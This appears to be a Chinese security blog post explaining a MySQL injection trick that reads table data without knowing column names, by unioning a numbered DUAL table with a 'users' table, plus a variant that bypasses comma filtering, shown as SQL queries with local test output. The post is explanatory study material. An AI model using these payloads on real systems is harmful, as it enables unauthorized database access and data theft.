<!DOCTYPE html>


  <html class="light page-post">


<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>MySQL注入绕过过滤字段名 | Homaebic-Know thyself</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="web,web安全,ctf,安全">
  

  <meta name="description" content="昨晚得知一种可以不知道字段名也可以注入出数据的技巧，赶快来试了一下。其核心在将一个可控的虚拟表V1与需要查询的真实表V2联合起来（使用union select），使得表字段可控从而查询数据。 首先创建一个和需要查询的表有相同列数的虚拟表1234567mysql&amp;gt; select * from ((select 1)a,(select 2)b,(select 3)c);+---+---+---+">
<meta property="og:type" content="article">
<meta property="og:title" content="MySQL注入绕过过滤字段名">
<meta property="og:url" content="http://hebic.me/2017/08/19/MySQL注入绕过过滤表名/index.html">
<meta property="og:site_name" content="Homaebic-Know thyself">
<meta property="og:description" content="昨晚得知一种可以不知道字段名也可以注入出数据的技巧，赶快来试了一下。其核心在将一个可控的虚拟表V1与需要查询的真实表V2联合起来（使用union select），使得表字段可控从而查询数据。 首先创建一个和需要查询的表有相同列数的虚拟表1234567mysql&amp;gt; select * from ((select 1)a,(select 2)b,(select 3)c);+---+---+---+">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2017-11-16T10:09:44.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="MySQL注入绕过过滤字段名">
<meta name="twitter:description" content="昨晚得知一种可以不知道字段名也可以注入出数据的技巧，赶快来试了一下。其核心在将一个可控的虚拟表V1与需要查询的真实表V2联合起来（使用union select），使得表字段可控从而查询数据。 首先创建一个和需要查询的表有相同列数的虚拟表1234567mysql&amp;gt; select * from ((select 1)a,(select 2)b,(select 3)c);+---+---+---+">

  

  
    <link rel="icon" href="/favicon.ico">
  

  <link href="/css/styles.css?v=c114cbe6" rel="stylesheet">


  
    <link rel="stylesheet" href="/css/personal-style.css">
  

  

  
  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?57e94d016e201fba3603a8a2b0263af0";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>


  
  <script type="text/javascript">
	(function(){
	    var bp = document.createElement('script');
	    var curProtocol = window.location.protocol.split(':')[0];
	    if (curProtocol === 'https') {
	        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
	    }
	    else {
	        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
	    }
	    var s = document.getElementsByTagName("script")[0];
	    s.parentNode.insertBefore(bp, s);
	})();
  </script>



  
    <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  
    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.3.0/css/font-awesome.min.css">
  
</head>
</html>
<body>


  

  <div class="post-header">
   

</div>




<div class="content content-post CENTER">
   <article id="post-MySQL注入绕过过滤表名" class="article article-type-post" itemprop="blogPost">
  <header class="article-header">
    <h1 class="post-title">MySQL注入绕过过滤字段名</h1>

    <div class="article-meta">
      <span>
        <i class="icon-calendar"></i>
        <span>2017.08.19</span>
      </span>

      

      


      
        <span>
          <i class="icon-comment"></i>
          <a href="http://hebic.me/2017/08/19/MySQL注入绕过过滤表名/#disqus_thread"></a>
        </span>
      

      
      <i class="fa fa-eye"></i> 
        <span id="busuanzi_container_page_pv">
           &nbsp热度 <span id="busuanzi_value_page_pv">
           <i class="fa fa-spinner fa-spin"></i></span>℃
        </span>
      

      
      
    </div>
  </header>

  <div class="article-content">
    
      <p>昨晚得知一种可以不知道字段名也可以注入出数据的技巧，赶快来试了一下。其核心在将一个可控的虚拟表V1与需要查询的真实表V2联合起来（使用union select），使得表字段可控从而查询数据。</p>
<p>首先创建一个和需要查询的表有相同列数的虚拟表<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from ((select 1)a,(select 2)b,(select 3)c);</span><br><span class="line">+<span class="comment">---+---+---+</span></span><br><span class="line">| 1 | 2 | 3 |</span><br><span class="line">+<span class="comment">---+---+---+</span></span><br><span class="line">| 1 | 2 | 3 |</span><br><span class="line">+<span class="comment">---+---+---+</span></span><br><span class="line">1 row in <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure></p>
<p>也可以使用DUAL表<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select 1,2,3 from DUAL;</span><br><span class="line">+<span class="comment">---+---+---+</span></span><br><span class="line">| 1 | 2 | 3 |</span><br><span class="line">+<span class="comment">---+---+---+</span></span><br><span class="line">| 1 | 2 | 3 |</span><br><span class="line">+<span class="comment">---+---+---+</span></span><br><span class="line">1 row in <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure></p>
<p>将此表与需要注入的表联合查询，需要数字在前。<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select 1,2,3 from DUAL union select * from users;</span><br><span class="line">+<span class="comment">-----+----------------------+------+</span></span><br><span class="line">| 1   | 2                    | 3    |</span><br><span class="line">+<span class="comment">-----+----------------------+------+</span></span><br><span class="line">|   1 | 2                    | 3    |</span><br><span class="line">|   1 | 0                    | aaaa |</span><br><span class="line">|   2 | Angelina             | aaaa |</span><br><span class="line">|   3 | Dummy                | aaaa |</span><br><span class="line">|   4 | secure               | aaaa |</span><br><span class="line">|   5 | stupid               | aaaa |</span><br><span class="line">|   6 | superman             | aaaa |</span><br><span class="line">|   7 | batman               | aaaa |</span><br><span class="line">|   8 | admin                | aaaa |</span><br><span class="line">|   9 | admin1               | aaaa |</span><br><span class="line">|  10 | admin2               | aaaa |</span><br><span class="line">|  11 | admin3               | aaaa |</span><br><span class="line">|  12 | dhakkan              | aaaa |</span><br><span class="line">|  14 | admin4               | aaaa |</span><br><span class="line">|  15 | Homaebic             | aaaa |</span><br><span class="line">|  16 | admin                | aaaa |</span><br><span class="line">|  18 | admin                | aaaa |</span><br><span class="line">| 100 | homaebic             | aaaa |</span><br><span class="line">| 101 | homaebic'            | aaaa |</span><br><span class="line">+<span class="comment">-----+----------------------+------+</span></span><br><span class="line">19 rows in <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure></p>
<p>此时查询出来的表字段名可控。将他命名为新表a，即可使用a.3的方法访问特定字段。<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select a.3 from (select 1,2,3 from DUAL union select * from users)a;</span><br><span class="line">+<span class="comment">------+</span></span><br><span class="line">| 3    |</span><br><span class="line">+<span class="comment">------+</span></span><br><span class="line">| 3    |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">| aaaa |</span><br><span class="line">+<span class="comment">------+</span></span><br><span class="line">19 rows in <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure></p>
<p>查询特定列数<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select a.3 from (select 1,2,3 from DUAL union select * from users)a limit 3,1;</span><br><span class="line">+<span class="comment">------+</span></span><br><span class="line">| 3    |</span><br><span class="line">+<span class="comment">------+</span></span><br><span class="line">| aaaa |</span><br><span class="line">+<span class="comment">------+</span></span><br><span class="line">1 row in <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure></p>
<p>如果过滤了逗号<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select d.3 from (select * from (select 1)a join (select 2)b join (select 3)c union select * from users)d limit 1 offset 3;</span><br><span class="line">+<span class="comment">------+</span></span><br><span class="line">| 3    |</span><br><span class="line">+<span class="comment">------+</span></span><br><span class="line">| aaaa |</span><br><span class="line">+<span class="comment">------+</span></span><br><span class="line">1 row in <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure></p>

    
  </div>
</article>


   
  <div class="text-center donation">
    <div class="inner-donation">
      <span class="btn-donation">支持一下</span>
      <div class="donation-body">
        <div class="tip text-center">扫一扫，支持forsigner</div>
        <ul class="theme.donation.items.length">
        
          <li class="item">
            <img src="/images/qr-wechat.png" alt="">
          </li>
        
          <li class="item">
            <img src="/images/qr-alipay.png" alt="">
          </li>
        
        </ul>
      </div>
    </div>
  </div>


   
  <div class="box-prev-next clearfix">
    <a class="show pull-left" href="/2017/08/19/审计入门之路（四）：GeniXCMS/">
        <i class="icon icon-angle-left"></i>
    </a>
    <a class="show pull-right" href="/2017/08/19/CSP绕过姿势总结（2017.3.1更新）/">
        <i class="icon icon-angle-right"></i>
    </a>
  </div>




</div>


  <a id="backTop" class="back-top">
    <i class="icon-angle-up"></i>
  </a>




  <div class="modal" id="modal">
  <span id="cover" class="cover hide"></span>
  <div id="modal-dialog" class="modal-dialog hide-dialog">
    <div class="modal-header">
      <span id="close" class="btn-close">关闭</span>
    </div>
    <hr>
    <div class="modal-body">
      <ul class="list-toolbox">
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/archives/" rel="noopener noreferrer" target="_self">
              博客
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/category/" rel="noopener noreferrer" target="_self">
              分类
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/tag/" rel="noopener noreferrer" target="_self">
              标签
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/link/" rel="noopener noreferrer" target="_self">
              友链
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/about/" rel="noopener noreferrer" target="_self">
              关于
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/atom.xml" rel="noopener noreferrer" target="_self">
              RSS
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/search/" rel="noopener noreferrer" target="_self">
              搜索
            </a>
          </li>
        
      </ul>

    </div>
  </div>
</div>



  
      <div class="fexo-comments comments-post">
    
  <section class="disqus-comments">
    <div id="disqus_thread">
      <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
    </div>
  </section>

  <script>
    var disqus_shortname = 'forsigner';
    
    var disqus_url = 'http://hebic.me/2017/08/19/MySQL注入绕过过滤表名/';
    
    (function(){
      var dsq = document.createElement('script');
      dsq.type = 'text/javascript';
      dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
  </script>

  <script id="dsq-count-scr" src="//forsigner.disqus.com/count.js" async></script>



    




    

    
	
  </div>

  

  <script type="text/javascript">
  function loadScript(url, callback) {
    var script = document.createElement('script')
    script.type = 'text/javascript';

    if (script.readyState) { //IE
      script.onreadystatechange = function() {
        if (script.readyState == 'loaded' ||
          script.readyState == 'complete') {
          script.onreadystatechange = null;
          callback();
        }
      };
    } else { //Others
      script.onload = function() {
        callback();
      };
    }

    script.src = url;
    document.getElementsByTagName('head')[0].appendChild(script);
  }

  window.onload = function() {
    loadScript('/js/bundle.js?235683', function() {
      // load success
    });
  }
</script>

</body>
</html>
